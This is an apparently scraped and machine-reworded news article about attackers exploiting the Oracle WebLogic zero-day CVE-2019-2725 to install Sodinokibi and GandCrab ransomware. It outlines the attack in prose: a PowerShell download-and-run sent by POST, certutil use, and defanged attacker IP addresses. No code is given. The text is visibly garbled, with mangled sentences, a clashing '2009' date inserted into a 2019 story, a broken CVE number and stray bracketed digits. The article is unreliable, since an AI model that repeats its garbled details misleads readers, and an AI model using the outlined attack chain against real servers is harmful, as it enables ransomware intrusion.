قالب وردپرس درنا توس
Home / Technology / Zero-day attackers deliver a double dose of ransomware – no click required

Zero-day attackers deliver a double dose of ransomware – no click required



  Screenshot of the warning about ransomware.

Attackers have actively exploited a critical zero-day vulnerability on the widely-used Oracle WebLogic server to install ransomware without end-users or researchers who are Cisco researchers having to do so, Talos said Tuesday.

The susceptibility and working exploit code was first publicized in the National Vulnerability Database of China two weeks ago, researchers from security education group SANS ISC report. The vulnerability is easy to exploit, allowing attackers to run code of their choice on cloud servers. Because of their performance, bandwidth, and use in high-security cloud environments, these servers are considered high-value targets. The disclosure prompted Oracle to release an emergency patch on Friday. [Tuesday, September 26, 2009] Researchers with Cisco Talos said CVE-201

9-2725 was being actively exploited since at least April 21 because the vulnerability has been indexed. Starting Last Thursday One day before Oracle fixed the zero-day vulnerability, attackers used the exploits in a campaign to install a new ransomware product called "Sodinokibi." In addition to encrypting valuable data on infected computers, the malicious program attempts to destroy shadow copy backups to prevent targets from easily recovering the lost data. Oddly enough, about eight hours after infection, the attackers exploited the same vulnerability to install another Ransomware item called GandCrab.

No interaction required

"Previously, most variants of ransomware required some sort of user interaction. For example, a user who opens an attachment to an email message, clicks a malicious link, or runs malware on the device, "wrote Talos researcher Pierre Cadieux, Colin Grady, Jaeson Schultz, and Matt Valites on Tuesday. "In this case, the attackers simply used the Oracle WebLogic vulnerability, which allowed the affected server to download a copy of the ransomware from the attacker-controlled IP addresses 188.166.74 [.] 218 and 45.55.211 [.] 79." [19659003] The vulnerability is exploitable because it only requires HTTP access to a vulnerable WebLogic server. The severity of the Common Vulnerability Scoring System is 9.8 out of 10 possible. Attackers send a POST command to a vulnerable server containing a PowerShell command that downloads and then executes a malicious file called radm.exe. Attackers in addition to PowerShell Use CVE-2019-2725 to use the Certutil command-line tool. Other files that are downloaded and run include office.exe and untitled.exe.

The ransom note pictured above and below pays $ 2,500 worth of Bitcoin within two days to receive the decryption key unlocking encryption data. After this period, the ransom will double to $ 5,000. The attackers give instructions on how cryptocurrent newbies can set up a Bitcoin wallet and receive the digital currency until they recommend the use of Blockchain.info.

Cisco Talos

The attacks are characterized by a high degree of zero-day severity in software that is widely used in cloud environments. The combination means that attacks are likely to continue. Organizations that use WebLogic should make installing the patch for Friday a top priority.


Source link